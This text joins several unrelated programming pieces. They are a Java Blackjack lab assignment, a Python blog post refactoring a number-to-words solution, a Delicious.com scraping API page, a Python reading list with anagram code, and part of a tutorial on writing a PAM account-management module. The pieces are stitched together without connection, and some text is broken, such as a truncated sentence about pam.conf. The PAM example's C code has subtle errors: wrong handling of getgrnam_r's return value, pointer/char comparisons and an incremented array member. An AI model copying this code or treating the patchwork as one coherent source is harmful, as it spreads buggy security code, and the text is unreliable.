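    @Override
    public String toString() {
        return RANKS[rank] + " of " + SUITS[suit];
    }
}
```

Using the lookup arrays keeps value() and toString() free of long switch statements.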
Deck has the following methods:
1. Deck(); A constructor that initializes a deck of playing cards in order by suit and then rank. The constructor instantiates 52 cards and stores them in its array, starting with the ace of clubs, two of clubs, three of clubs, ... , king of clubs, ace of diamonds, two of diamonds, etc.
2. static Deck shuffledDeck(); Returns a new, randomized deck of cards. A random deck can be created by starting with a standard deck and then shuffling it. Here's one way to shuffle the deck: Pick any two cards at random, and then swap them in the deck. By itself, this won't shuffle the cards very much. So, repeat it, say 1000 times. The deck should be well shuffled by then. Here is a function that will help with this:
private static int randomIndex() {
return (int) (DECK_SIZE*Math.random());
}
where DECK_SIZE is a static final int with value 52. This returns a random index into the card array, with value between 0 and 51.
3. int sizeRemaining(); Returns a count of the number of cards which have not yet been dealt.
4. Card dealCard(); Return the next card from the top of the deck. This method can be used by any object that wants to deal from the deck. When a card is dealt, the index pointing to the top card should be advanced by one card.
5. static void main(String[] args); For testing purposes, write a main method which creates a shuffled deck and displays all 52 of its cards, one per line. Again, after this tests out correctly delete this main() method.
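The swap-based shuffle from item 2 can be sketched as follows. This is only an illustration: it uses an int array as a stand-in for your Card array, and the method name is not part of the required interface.

```java
// Hypothetical sketch of the repeated-random-swap shuffle described above,
// using ints as stand-ins for Card objects.
public class ShuffleSketch {
    private static final int DECK_SIZE = 52;

    private static int randomIndex() {
        return (int) (DECK_SIZE * Math.random());
    }

    // Shuffle in place by repeatedly swapping two randomly chosen positions.
    public static void shuffle(int[] cards) {
        for (int i = 0; i < 1000; i++) {
            int a = randomIndex();
            int b = randomIndex();
            int tmp = cards[a];
            cards[a] = cards[b];
            cards[b] = tmp;
        }
    }
}
```

Note that a swap only rearranges cards, so the shuffled deck is always a permutation of the original 52 cards.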
In the game of Blackjack, a player is dealt 2 cards initially. After
that, the player may request being "hit" with additional cards. The objective
is to obtain a hand whose value is as close as possible to 21, without going
over 21. (A hand with a value greater than 21 is a "bust", and automatically
loses the game.)
To model a Blackjack hand, you can use an array to store the cards held in the hand. You should also keep track of the number of cards in the hand. You may assume that a hand never has more than 20 cards. Then write the following methods:
1. Hand(Card card1, Card card2); This constructor initializes a Hand with two cards dealt from the dealer.
2. Card getCard(int i); Return the ith Card from the Hand.
3. void add(Card card); Add a Card to a Hand.
4. int value(); Compute the value of the Hand. The value of the Hand is the sum of the values of the cards in the Hand. Now we need to take into account the rule that Aces can be valued as 1 or 11. Suppose v is the sum of the values of the cards in the hand (counting Aces as 11) and n is the number of Aces. Let j be the smallest number <= n so that v-10*j is <= 21 (i.e., j is the number of Aces we will count as 1 rather than 11). Then the value of the hand is v-10*j.
5. boolean hasBlackJack(); A Hand has BlackJack if it contains an ace and a 10-point card; that is, it is a two-card hand with a value of 21.
6. boolean isBusted(); A Hand is busted if its value exceeds 21.
7. String toString(); Return a string describing the contents of the Hand. The String should consist of the String representation of each Card in the Hand, separated by newline characters. If the Hand has BlackJack, append the word "BlackJack" to the String. If the Hand is a bust, append the word "Bust" to the String. For example,
"Ten of Clubs\nFive of Clubs\nNine of Hearts\n\nBust", which would appear as
Ten of Clubs
Five of Clubs
Nine of Hearts
Bust
8. public static void main(String[] args); Write a main method (for testing purposes) which creates a random deck, deals a hand from it, and displays it. Again, you should delete this method after testing your implementation.
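The Ace adjustment from item 4 above can be sketched as a standalone helper. The inputs here (an array of card values with every Ace already counted as 11, plus the Ace count) are an assumption made so the sketch is self-contained; in your Hand class you would compute them from the stored Cards.

```java
// Hypothetical sketch of Hand.value()'s Ace adjustment: sum with Aces
// counted as 11, then demote Aces to 1 (subtract 10 each) until the
// total is 21 or less, or no Aces remain.
public class HandValueSketch {
    public static int value(int[] cardValues, int aceCount) {
        int v = 0;
        for (int cv : cardValues) {
            v += cv;
        }
        int aces = aceCount;
        while (v > 21 && aces > 0) {
            v -= 10;   // count one more Ace as 1 instead of 11
            aces--;
        }
        return v;
    }
}
```

The loop finds the smallest j described in item 4 without any explicit search.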
The jar file for this lab implements a graphical interface for the BlackJack game. It consists of two files:
BlackJackInterface implements a window-based interface, which looks like this:
The frame contains two text areas (JTextArea) and three buttons (JButton). The left text area is used to display the player's hand and its value. The right text area is for the Dealer's hand; during play, only one of the dealer's two cards is visible to the player.
During play, the Play button is disabled. The Hit and Stand buttons are enabled, allowing the user to choose an avenue of play.
At the end of a game, the GUI looks like this:
The left text area displays the player's hand; the right text area displays the Dealer's hand. The text areas also display the value of each hand. The outcome of the game (Win, Lose, or Push) is displayed in the player's text area.
The Play button is enabled when the program is started and when a game is completed, and allows the user to start a new game. The Hit and Stand buttons are disabled while the Play button is active, and Play is disabled during a game, when Hit and Stand are enabled.
File BlackJack.java makes use of the interface to play the game. Class BlackJack maintains the deck of cards and hands for the player and dealer. It contains callback procedures for the buttons. The callback for the Play button just initializes the two hands and displays them. The callback for the Hit button adds a card to the player's hand, checks to see if the player has exceeded 21, and updates the display. The callback for the Stand button repeatedly adds cards to the dealer's hand until it exceeds the player's hand or busts. At this point it determines the winner of the game and updates the display. Finally, it reactivates the Play button to see if the user wants to play another game.
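The Stand-button logic described above can be sketched in isolation. Everything here is an illustrative assumption — the class name, the signature, and the way the dealer's draws are supplied as plain values rather than dealt from a Deck — but the control flow matches the description: the dealer draws until his total exceeds the player's or he busts, then the winner is decided.

```java
// Hypothetical sketch of the Stand callback's dealer loop; names and
// signature are illustrative, not the lab's actual API.
public class StandSketch {
    // Returns the outcome from the player's point of view.
    public static String outcome(int playerValue, int[] dealerDraws, int dealerStart) {
        int dealer = dealerStart;
        int i = 0;
        // Dealer keeps drawing while not ahead of the player and not busted.
        while (dealer <= playerValue && dealer <= 21 && i < dealerDraws.length) {
            dealer += dealerDraws[i++];
        }
        if (dealer > 21) {
            return "Win";    // dealer busts, player wins
        }
        if (dealer > playerValue) {
            return "Lose";   // dealer beat the player without busting
        }
        return "Push";       // equal totals
    }
}
```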
Why Python programmers should learn Python
I recently clicked upon Keith Braithwaite and Ivan Moore’s presentation, “Why Java Programmers Should Learn Python”. It starts off well with an expert discussion of three different axes of type systems, placing various programming languages in the resulting 3-space. It then poses a programming problem, the kind of problem which Python excels at:
Given the supplied library classes write some code in “quickSilver” to convert between word and decimal digits representations of positive integers less than 1001.
e.g. “five seven three” → 573
e.g. 672 → “six seven two”
The Java programmers attending the presentation don’t know it yet, but “quickSilver” turns out to be Python, or at least a subset of it sufficient to solve the problem, and the final slides of the presentation contain a model solution to this problem.
A “model” solution?
Here is that solution.
class WordsFromNumber:
    def __init__(self, number):
        self.representationOf = number

    def wordsOf(self):
        lsd = self.representationOf % 10
        msds = self.representationOf / 10
        if msds == 0:
            return self.wordFor(self.representationOf)
        else:
            return WordsFromNumber(msds).wordsOf() + " " + \
                   self.wordFor(lsd)

    def wordFor(self, numeral):
        return ["zero", "one", "two", "three", "four",
                "five", "six", "seven", "eight", "nine"][numeral]


class NumberFromWords:
    def __init__(self, words):
        self.representation = words

    def number(self):
        words = split("\\s", self.representation)
        return self.unpack(words)

    def unpack(self, words):
        if len(words) == 1:
            return self.numberFor(words[0])
        else:
            lswi = len(words) - 1
            lsw = words[lswi]
            msws = words[0:lswi]
            return self.numberFor(lsw) + 10 * self.unpack(msws)

    def numberFor(self, word):
        return {"zero": 0, "one": 1, "two": 2, "three": 3,
                "four": 4, "five": 5, "six": 6, "seven": 7,
                "eight": 8, "nine": 9}[word]
I don’t know what point the presenters were trying to make. I wasn’t in their audience but if I were, this code wouldn’t go any way towards persuading me I should bother with Python. It’s got two classes where none is needed, it uses recursion when container operations would do, it’s longer than it needs to be, and (putting myself in a Java programmer’s shoes) are all those
selfs really needed?
In other words this, to me, looks like Java written in Python. I’ll assume this is the point the presenters are trying to make, but if they revise the presentation, I’d like to suggest extending it to add an alternative ending, which I think shows off Python’s advantages.
number_to_word = { '0' : 'zero', '1' : 'one', '2' : 'two', '3' : 'three',
                   '4' : 'four', '5' : 'five', '6' : 'six', '7' : 'seven',
                   '8' : 'eight', '9' : 'nine' }

word_to_number = { 'zero' : 0, 'one' : 1, 'two' : 2, 'three' : 3,
                   'four' : 4, 'five' : 5, 'six' : 6, 'seven' : 7,
                   'eight' : 8, 'nine' : 9 }

def number_to_words(number):
    return ' '.join(number_to_word[c] for c in str(number))

def words_to_number(words):
    def dec_shift_add(x, y):
        return x * 10 + y
    return reduce(dec_shift_add,
                  (word_to_number[w] for w in words.split()))
I’ve omitted documentation in order to squeeze the encode-decode functions on to a single slide. If I had time and space, though, I’d show how to document and test this function in one go using
doctest, taking care to cover what happens with invalid inputs.
By the way, you’ll see I’m using
reduce while I can! I think this example is one of those rare cases where it works well.
Dictionary initialisation
The explicit dictionaries are fine and good and almost certainly what should be presented to an audience of Python virgins, but in my own code I’d be tempted to remove a little replication. (My thanks to Ashwin for tactfully pointing out a howling bug in the code originally posted here).
import string

words = "zero one two three four five six seven eight nine".split()
number_to_word = dict(zip(string.digits, words))
word_to_number = dict(zip(words, range(10)))
Living by the Sword
A recent (2008-03-07) wave of hits from Reddit has prompted me to revisit this note and, cough, refactor my code. There’s no need for any mathematics, nested functions or
reduce: this problem is better handled by string conversions. And the goal of squeezing functions on a single slide is misguided. This code needs doctesting. Java programmers are used to good test frameworks with great tool support, but Python excels at this too.
from string import digits

words = 'zero one two three four five six seven eight nine'.split()
number_to_word = dict(zip(digits, words))
word_to_number = dict(zip(words, digits))

def number_to_words(number):
    '''Converts a non-negative integer into a string of digit names.

    Examples:
    >>> number_to_words(-1)
    Traceback (most recent call last):
    ...
    KeyError: '-'
    '''
    return ' '.join(number_to_word[c] for c in str(number))

def words_to_number(words):
    '''Converts a string of digit names into an integer.

    Examples:
    >>> words_to_number('one two three')
    123
    >>> words_to_number('One tWo thrEE')
    123
    >>> words_to_number('zero one two')
    12
    >>> words_to_number('minus one')
    Traceback (most recent call last):
    ...
    KeyError: 'minus'
    >>> all(words_to_number(number_to_words(x)) == x for x in range(100))
    True
    '''
    return int(''.join(word_to_number[w] for w in words.lower().split()))

if __name__ == "__main__":
    import doctest
    doctest.testmod()
Feedback
An alternative for words_to_number which may or may not be better:
...
word_to_number = dict(zip(words, string.digits))
...
def words_to_number(words):
    int(''.join([word_to_number[x] for x in words.split()]))
Thanks SpComb, I think I do prefer your version. It's more symmetrical.
Hi Thomas, Thanks for your comments. It was a long time ago that we did that session, and we would probably do it differently today.
The goal really wasn't to show off any particular features of Python (despite the title)--we'd have preferred to use Smalltalk or Self anyway, but Python seemed to us the least threatening dynamic OO language at the time. The goal was only to fairly gently open some folk's eyes to what happens when you start to move away from the straightjacket of Java.
I dimly recall that we didn't want to "frighten the horses" too much, which would have been easy: for example, one attendee claimed quite strenuously that there was no advantage to a language having more abstract constructs in it for traversing a collection than the for-loop because for-loop code just flows out of your fingers so easily you hardly notice.
Keith
Del.icio.us Python API
From Michael G. Noll
One of my recent research tasks required me to retrieve various information from Delicious.com, a well-known social bookmarking service. My programming language of choice is Python, and so I wrote a basic Python module for getting the data I needed.
Figure 1: A tag cloud as seen on Delicious.com.
deliciousapi.py

Among other things, the module provides:
- get_urls(): retrieves popular or recent web pages for a given tag, via Delicious.com's /popular/<tag> and /tag/<tag> pages
- get_user(): returns a user's most recent public bookmarks (up to 100) if you don't know the password
- get_tags_of_user(): returns a user's full tagging vocabulary, i.e. tags and tag counts, aggregated over all public bookmarks
- HTTP proxy support
Please note that DeliciousAPI can currently not scrape a user's full public bookmark collection if you don't know the user's password. This is because of technical restrictions on del.icio.us' side.
Here is a code snippet to demonstrate basic usage of deliciousapi.py:
import deliciousapi

dapi = deliciousapi.DeliciousAPI()
url = ""
username = "jsmith"

# web pages shown on the front page of Delicious.com aka the 'hotlist'
featured_links = dapi.get_urls()

# popular web pages tagged with "photography"
popular_photography_links = dapi.get_urls(tag="photography")

# web pages recently tagged with "web2.0", up to a maximum of
# 300 URLs if possible; note that get_urls() cannot guarantee
# that the list of URLs is free of duplicate items - this is
# due to the way Delicious.com generates the regular feeds for
# a given tag (i.e. /tag/<tag> as opposed to /popular/<tag>)
recent_web20_links = dapi.get_urls(tag="web2.0", popular=False, max_urls=300)

# DeliciousURL object, providing
# .title : title of the web document as stored on delicious.com
# .url : URL of the corresponding web document
# .total_bookmarks: total number of bookmarks/users for this url
# .bookmarks : list of (user, tags, comment, timestamp) tuples
# .top_tags: list of (tag, tag_count) tuples, representing the
#            most popular tags of this url (up to 10)
# .tags : dict mapping tags to total tag count
#
# Note that by default, get_url() does only retrieve the
# 50 most recent bookmarks of a given url. You can control
# this behavior with the max_bookmarks parameter (see
# docstrings).
url_metadata = dapi.get_url(url)

print url_metadata
# output: [] 103 total bookmarks (= users), 187 tags (37 unique), 10 out of 10 max 'top' tags

print url_metadata.title
# output: Del.icio.us Python API - Michael G. Noll

print url_metadata.bookmarks
# output: [
#   (u'neetij', [u'python', u'api', u'del.icio.us', u'programming'], None, datetime.datetime(2008, 8, 4, 0, 0)),
#   (u'jsf.online', [u'software', u'programming', u'free', u'development', u'del.icio.us', u'python', u'2008'], u'Python API - wraps the del.icio.us api for python', datetime.datetime(2008, 8, 4, 0, 0)),
#   (u'as11018', [u'python', u'api', u'programming'], None, datetime.datetime(2008, 7, 30, 0, 0)),
#   ...]

print url_metadata.top_tags
# output: [ (u'python', 91), (u'api', 73), (u'del.icio.us', 71), ... ]

print url_metadata.tags
# output: { u'is:api': 1, u'code': 6, u'toread': 1, ... }

# If get_user() is called with both username and password, the full
# bookmark collection of the user is returned, including any private
# bookmarks. Communication is encrypted via SSL. You can use get_user()
# for creating a backup of your Delicious.com bookmarks.
#
# If get_user() is called without password, only the most recent
# public bookmarks of the given user are returned (up to 100).
#
# DeliciousUser object, providing
# .bookmarks : list of (url, tags, title, notes, timestamp) tuples
# .tags : dict mapping tags to total tag count
# .username : name of the corresponding del.icio.us user
user_metadata = dapi.get_user(username)

print user_metadata
# output: [jsmith] 31 bookmarks, 78 tags (45 unique)

print user_metadata.bookmarks
# output: [ (u'', [u'mashup', u'tools', u'twitter'], u'Twellow.com :: Twitter users organized into business categories', u'Kind of yellow pages for Twitter, interesting.', datetime.datetime(2008, 6, 25, 0, 0, 0)), ... ]

# tags and tag counts of the user
user_tags = dapi.get_tags_of_user(username)
print user_tags
# output: { 'golf': 1, 'toread': 11, 'recipe': 1, 'rest': 4, ... }
deliciousmonitor.py
I have also written a Python script for monitoring Delicious.com bookmark RSS feeds. The default RSS feed is the "hotlist" of urls you see on the Delicious.com front page.
This script requires DeliciousAPI and demonstrates how it can be used. Basically, it mirrors the RSS feed and retrieves additional metadata such as an entry’s most popular tags from the Delicious.com service itself.
Here is an example output:
<document url="" users="103" top_tags="10">
  <top_tag name="python" count="91" />
  <top_tag name="api" count="73" />
  <top_tag name="del.icio.us" count="71" />
  <top_tag name="delicious" count="32" />
  <top_tag name="programming" count="29" />
  ...
</document>
Download
You can now download and install DeliciousAPI from the Python Cheese Shop (the package includes only deliciousapi.py) via setuptools/easy_install. Just run
- easy_install DeliciousAPI, or
- easy_install -U DeliciousAPI for updates
and after installation, a simple import deliciousapi in your Python scripts will do the trick.
An alternative is to download the code straight from my Subversion repository.
- deliciousapi.py
- deliciousmonitor.py (requires deliciousapi.py and Universal Feed Parser)
The code has been tested with Python 2.4.3 and 2.5.
License
The code is licensed to you under the GNU General Public License, version 2.
Feedback
Comments, questions and constructive feedback are always welcome. Just drop me a note.
Essential Python Reading List
Contents
Here’s my essential Python reading list.
- The Zen of Python
- Python Tutorial
- Python Library Reference
- Python Reference Manual
- The Python Cookbook
- Code Like a Pythonista: Idiomatic Python
- Functional Programming HOWTO
- Itertools functions
- Python library source code
- What’s New?
The Zen of Python
Type import this at a Python prompt to read the Zen of Python, the language’s guiding aphorisms. If this doesn’t ring true, Python isn’t for you.
Python Tutorial
Your next stop should be the Python tutorial. It’s prominently available at the top of the online documentation tree, with the encouraging prompt:
start here
The latest version (by which I mean the version corresponding to the most recent stable release of Python) can be found on the web at, but I recommend you find and bookmark the same page from your local Python installation: it will be available offline, pages will load fractionally quicker, and you’re sure to be reading about the version of Python you’re actually running. (Plus, as I’ll suggest later, it’s well worth becoming familiar with the contents of your Python installation).
And with this tutorial, you’ll be running code right from the start. No need to page through syntax definitions or battle with compiler errors.
Since the best way to learn a language is to use it, the tutorial invites you to play with the Python interpreter as you read.
If you have a programming background you can complete the tutorial in a morning and be using Python by the afternoon; and if you haven’t, Python makes an excellent first language.
A tutorial cannot cover everything, of course, and this one recognises that and points you towards further reading. The next place to look, it says, is the Python Library Reference. I agree.
Python Library Reference
The documentation index suggests you:
keep this under your pillow
It’s a reference. It documents use of the standard libraries which came with your Python installation. I’m not suggesting you read it from cover to cover but you do need to know where it is and what’s in it.
You should definitely read the opening sections which cover the built-in objects, functions and types. I also suggest you get used to accessing the same information from within the Python interpreter using help: it may not be hyperlinked or prettily laid out, but the information is right where you need it.
>>> help(dict)
Help on class dict in module __builtin__:

class dict(object)
 ...
Python Reference Manual
The Language Reference claims to be:
for language lawyers
but I’m not sure that’s true. Readable and clear, it offers a great insight into the language’s design. Again, you may not want to read it straight through, but I suggest you skim read it now and return to it if you find yourself confused by Python’s inner workings.
The Python Cookbook
The Python Cookbook is the first slab of treeware I’m recommending. Yes, ActiveState provides a website for the book, which has even more recipes than the book and is well worth a visit, but I’d say you want the printed edition. It’s nicely laid out and provides clear examples of how to use Python for common programming tasks. Alternative approaches are discussed. You can dip in to it or read the sections most relevant to your particular domain. This book teaches you idiomatic Python by example and, remarkably, it actually benefits from being written by a large team of authors. The editors have done an excellent job.
Incidentally, if you’re wondering why I claim Python is a high-level language and C++ isn’t, just compare the contents of the Python Cookbook with the contents of its C++ counterpart. Both books weigh in at ~600 pages, but the C++ one barely gets beyond compiling a program and reading from a file.
Code Like a Pythonista: Idiomatic Python
This one’s a presentation David Goodger gave at a conference last year. I wish he’d written it and I’d read it sooner. If you care about code layout, how you name things etc. but don’t want to waste time arguing about such things, then you probably want to go with the native language conventions. Python has a well-defined style and this presentation describes it well, connecting and summarising the contents of several other references.
Functional Programming HOWTO
The next version of the Python documentation (for versions 2.6 and later) has a HOWTOs section. A. M. Kuchling’s Functional Programming HOWTO is a must-read, especially for anyone coming from a language with weak support for FP. Python is far from being a pure functional programming language, but features like list comprehensions, iterators, generators, even decorators, draw direct inspiration from functional programming.
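Those features pack a lot into very few lines. As a quick illustration (a sketch of my own, with made-up names, not taken from the HOWTO):

```python
# a decorator that counts calls, applied to a function used
# from a list comprehension and a generator expression
def counted(fn):
    def wrapper(*args):
        wrapper.calls += 1
        return fn(*args)
    wrapper.calls = 0
    return wrapper

@counted
def double(x):
    return 2 * x

evens = [double(n) for n in range(4)]   # eager: calls double four times
halves = (n // 2 for n in evens)        # lazy: nothing computed yet
```

The list comprehension evaluates immediately; the generator expression produces values only as they are consumed.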
Itertools functions
If you took my advice and skim-read the Library Reference, you may have skipped past a small module (mis?)filed in the Numeric and Mathematical Modules section. Now’s the time to go back and study it. It won’t take long, but these itertools functions are, to me, the epitome of elegance and power. I use them every day, wish they were promoted to builtins, and most of my interpreted Python sessions start:
>>> from itertools import *
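As a small taste of these functions (a sketch of my own, not from the article):

```python
from itertools import count, groupby, islice

# the first five square numbers, generated lazily from an
# infinite stream of integers
squares = list(islice((n * n for n in count(1)), 5))

# run-length encode a string: groupby gathers equal adjacent items
rle = [(ch, len(list(group))) for ch, group in groupby("aaabbc")]
```

Neither computation needs an explicit loop counter or a temporary accumulator.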
Python library source code
The pure-python modules and test code in your Python installation are packed with good, readable code. If you’re looking for example code using a particular module, have a look at that module’s unit tests.
What’s New?
I’ve mentioned Python versions a few times in this article. Although Python takes stability and backwards compatibility seriously, the language has been updated every year for as long as I’ve been using it. Generally, the changes are backwards compatible so, for example, 2.1 code should work fine in 2.5, but it’s important to stay current.
Do you write code like this?
anag_dict = {}
words_fp = open("wordlist.txt", "rt")
for line in words_fp.readlines():
    word = line.strip().lower()
    chars = []
    for ch in word:
        chars.append(ch)
    chars.sort()
    key = "".join(chars)
    anag_dict.setdefault(key, []).append(word)
words_fp.close()
anagrams = []
for words in anag_dict.values():
    if len(words) > 1:
        anagrams.append(words)
Then you should find out about list comprehensions, the built-in sorted function, and defaultdicts — introduced in Python 2.0, 2.4, 2.5 respectively!
from collections import defaultdict

anag_dict = defaultdict(list)
with open("wordlist.txt", "rt") as words_fp:
    for line in words_fp:
        word = line.strip().lower()
        key = "".join(sorted(word))
        anag_dict[key].append(word)
anagrams = [words for words in anag_dict.itervalues() if len(words) > 1]
The with statement, incidentally, appears in 2.6, which is in alpha as I write this. Get it now by:
from __future__ import with_statement
Anyway, the point of all this is that A. M. Kuchling writes up what’s new in each Python revision: think of it as the release notes. As an example, here’s What’s New in Python 2.5. Essential reading.
Other Books?
I’ve only mentioned one book on this reading list. There are plenty of other decent Python books but I don’t regard them as essential. In fact, I’d rather invest in an excellent general programming title than (for example) Programming Python.
Why? Well, partly because of the speed at which the language progresses. Thus the second edition of the Python Cookbook — the single book I regard as essential — did a great job of being 2.4 compliant before 2.4 was even released, which definitely extended its shelf-life; but it has nothing to say about Python 2.5 features, let alone Python 2.6 and the transition to Python 3.0. And partly because the books all too easily become too thick for comfortable use. Python famously comes with batteries included, but full details of their use belongs online.
I do own a copy of Python Essential Reference by David Beazley. It’s the second edition and is now woefully out of date (covering Python up to version 2.1). I did get good use out of it, though. It’s well designed, beautifully written and laid out, and, weighing in at fewer than 400 pages, comfortable to read and carry. Somehow it manages (managed, I should say) to pack everything in: it’s concise, and it recognises that the online documentation should be the source of authoritative answers. Despite this, I haven’t bought the third edition. Partly because I don’t really need it, partly because it’s now a Python point revision or two out of date, and partly because it’s expanded to 644 pages.
The Reading List, with Links
- The Zen of Python
- Python Tutorial
- Python Library Reference
- Python Reference Manual
- The Python Cookbook
- Code Like a Pythonista: Idiomatic Python
- Functional Programming HOWTO
- Itertools functions
- Python library source code
- What’s New
There’s nothing controversial here. The Zen of Python should whet your appetite, and the next three items are exactly what you’ll find at the top of the Python documentation home page. Others may argue Python in a Nutshell deserves a place, or indeed the hefty Programming Python, and they’re certainly good books.
I’d be more interested to find out which non-Python books have improved your Python programming the most. For myself, I’ll predictably pick Structure and Interpretation of Computer Programs.
The anagrams puzzle comes from Dave Thomas’s CodeKata, a nice collection of programming exercises. The solutions presented here gloss over a few details and make assumptions about the input. Is “face” an anagram of “café”, for example? For that matter, what about “cafe” and “café”. Or “isn’t” and “tins”? What if the word list contains duplicates? These issues aren’t particularly hard to solve but they do highlight the dangers of coding up a solution without fully specifying the problem, and indeed the difference between a “working” solution and a finished one.
However, I just wanted a short program to highlight advances in recent versions of Python, and in that light, here’s another variant. (My thanks to Marius Gedminas for spotting a bug in the code I originally posted here.)
from itertools import groupby, ifilter, imap
from operator import itemgetter
from string import (ascii_lowercase, ascii_uppercase,
                    punctuation, maketrans, translate)

key = sorted
second = itemgetter(1)
to_lower = maketrans(ascii_uppercase, ascii_lowercase)

data = open("wordlist.txt", "rt").read()
translated = translate(data, to_lower, deletions=punctuation)
words = set(translated.split())
sorted_words = sorted(words, key=key)
grouped_words = imap(list, imap(second, groupby(sorted_words, key)))
anagrams = ifilter(lambda words: len(words) > 1, grouped_words)
Learn to write PAM (Pluggable Authentication Modules) service modules for authentication and security services, and see an example module.
In the first three articles in this series (Part 1, Part 2, and Part 3) we covered the basics of password-based user authentication, concentrating on the use of PAM (Pluggable Authentication Modules). We described the PAM API that applications (called PAM consumers) use for authentication, and showed how to write PAM conversation functions.
In this fourth, and final, article we'll describe PAM service modules and show an example of how to write them. the PAM configuration file, /etc/pam.conf. We described PAM configuration files in Part 2 of this series.
/etc/pam.conf
We mentioned in Part 2 of this series that PAM consumers call one or more of the following functions to perform user authentication and related functions:
pam_authenticate
pam_acct_mgmt
pam_setcred
pam_open_session
pam_close_session
pam_chauthtok
Each of these functions is implemented in service modules by functions having the same name, except that the pam_ prefix is replaced with pam_sm_. So, pam_authenticate is implemented by pam_sm_authenticate, pam_sm_acct_mgmt implements pam_acct_mgmt, and so on. Service modules that we write must provide one or more of these functions.
To communicate with PAM consumer applications, service modules use the pam_get_item and pam_set_item functions, as shown in the following code example. (We should also point out that PAM consumers can use these functions to communicate with service modules.)
#include <security/pam_appl.h>
int pam_get_item(const pam_handle_t *pamh, int item_type,
void **item);
int pam_set_item(pam_handle_t *pamh, int item_type,
const void *item);
The pam_set_item function enables service modules to update information for the PAM transaction specified by the handle, pamh. The information type, specified by item_type, can be one of about a dozen specified in the pam_set_item man page. Examples of item types include PAM_AUTHTOK, PAM_CONV, PAM_USER, and PAM_USER_PROMPT. The value we want to set the PAM information to is specified by item.
Similarly, the information for a PAM transaction can be accessed by calling pam_get_item. In this case, a pointer to the PAM information of the specified type is placed into item.
Service modules can access and update module-specific information using the pam_get_data and pam_set_data functions. We won't discuss these functions further because we're focusing on communications between PAM service modules and their consumers. Interested readers are referred to these functions' man pages for more details.
PAM service modules must provide a PAM return code to their consumer. This return code must be one of three types:
- PAM_SUCCESS
- PAM_IGNORE
- PAM_<error>, for example PAM_USER_UNKNOWN or PAM_PERM_DENIED
To prevent the display of unwanted messages, all service modules must honour the PAM_SILENT flag. We recommend the use of the debug flag to enable the logging of diagnostic debugging information via the syslog facility. Debugging messages logged using syslog should use the LOG_AUTH facility and LOG_DEBUG severity level. Any other messages logged using syslog should use the LOG_AUTH facility with an appropriate priority level.
Important: The syslog-related functions openlog, closelog, and setlogmask must not be used in service modules because they interfere with the application's settings.
Now that we've described service modules and what they must do, let's have a look at one. The service module we write provides a mechanism by which named users in a certain group are denied access. An example of where this could be useful would be a web hosting company: customers are allowed to connect via ftp and sftp, but login shells are forbidden. This access policy can be enforced by using this module and naming the customers in the forbidden group.
This type of account access policy is applied to users who have successfully authenticated, so it could be characterized as account management. PAM-aware applications call pam_acct_mgmt to perform this task, so our example module implements pam_sm_acct_mgmt, which has the following prototype:
#include <security/pam_appl.h>
#include <security/pam_modules.h>
int pam_sm_acct_mgmt (pam_handle_t *pamh, int flags, int argc,
const char **argv);
The PAM handle returned by pam_start is referenced by pamh, flags contains any flags passed to the module by the application, and argc and argv contain the number of module options specified in pam.conf and the list of options respectively.
Here's the source code to our example module.
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <grp.h>
4 #include <string.h>
5 #include <syslog.h>
6 #include <security/pam_appl.h>
7 int pam_sm_acct_mgmt (pam_handle_t *ph, int flags, int argc, char **argv)
8 {
9 char *user = NULL;
10 char *host = NULL;
11 char *service = NULL;
12 char *denied_group = "";
13 char group_buf[8192];
14 struct group grp;
15 struct pam_conv *conversation;
16 struct pam_message msg;
17 struct pam_message *msgp = &msg;
18 struct pam_response *resp = NULL;
19 int i;
20 int err;
21 int no_warn = 0;
22 int debug = 0;
23 int ret_val;
24 for (i = 0; i < argc; i++) {
25 if (strcasecmp (argv[i], "nowarn") == 0)
26 no_warn = 1;
27 else if (strcasecmp (argv[i], "debug") == 0)
28 debug = 1;
29 else if (strncmp (argv[i], "group=", 6) == 0)
30 denied_group = &argv[i][6];
31 }
32 if (flags & PAM_SILENT)
33 no_warn = 1;
34 pam_get_user (ph, &user, NULL);
35 pam_get_item (ph, PAM_SERVICE, (void **)&service);
36 pam_get_item (ph, PAM_RHOST, (void **)&host);
37 if (user == NULL) {
38 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: user not set", service);
39 ret_val = PAM_USER_UNKNOWN;
40 goto out;
41 }
42 if (host == NULL)
43 host = "unknown";
44 if (getgrnam_r (denied_group, &grp, group_buf, sizeof (group_buf)) == NULL) {
45 syslog (LOG_AUTH | LOG_NOTICE, "%s: denied_group: group \"%s\" not defined",
46 service, denied_group);
47 ret_val = PAM_SYSTEM_ERR;
48 goto out;
49 }
50 if (grp.gr_mem[0] == '\0') {
51 if (debug)
52 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: group \"%s\" is empty: "
53 "all users allowed", service, grp.gr_name);
54 ret_val = PAM_IGNORE;
55 goto out;
56 }
57 for (; grp.gr_mem[0]; grp.gr_mem++) {
58 if (strcmp (grp.gr_mem[0], user) == 0) {
59 msg.msg_style = PAM_ERROR_MSG;
60 msg.msg = "Access denied: you are not on the access list for this host.";
61 pam_get_item (ph, PAM_CONV, (void **)&conversation);
62 if ((no_warn == 0) && (conversation != NULL)) {
63 err = conversation->conv (1, &msgp, &resp, conversation->appdata_ptr);
64 if (debug && err != PAM_SUCCESS) {
65 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: conversation returned %s",
66 service, pam_strerror (ph, err));
67 }
68 if (resp != NULL) {
69 if (resp->resp)
70 free (resp->resp);
71 free (resp);
72 }
73 }
74 syslog (LOG_AUTH | LOG_NOTICE, "%s: denied_group: Connection for %s "
75 "not allowed from %s", service, user, host);
76 ret_val = PAM_PERM_DENIED;
77 goto out;
78 }
79 }
80 if (debug)
81 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: user %s is not a member of "
82 "group %s. Access granted.", service, user, grp.gr_name);
83
84 ret_val = PAM_SUCCESS;
85 out:
86 return (ret_val);
87 }
Let's take a closer look at this 80-line function. Note that for the sake of this example, we've arbitrarily limited the buffer group_buf (defined on line 13) to 8K characters. In a real program we'd probably dynamically size this buffer depending on the maximum system value, as determined by calling sysconf.
- 1-6: Include the required header files.
- 24-33: Interpret the module options, setting the debug and no-warnings flags as appropriate.
- 34-36: Get the user, service, and remote host names.
- 37-41: Deny access if the user isn't specified.
- 44-49: Deny access if the specified group isn't defined.
- 50-56: Allow access for all users if the specified group has no named members.
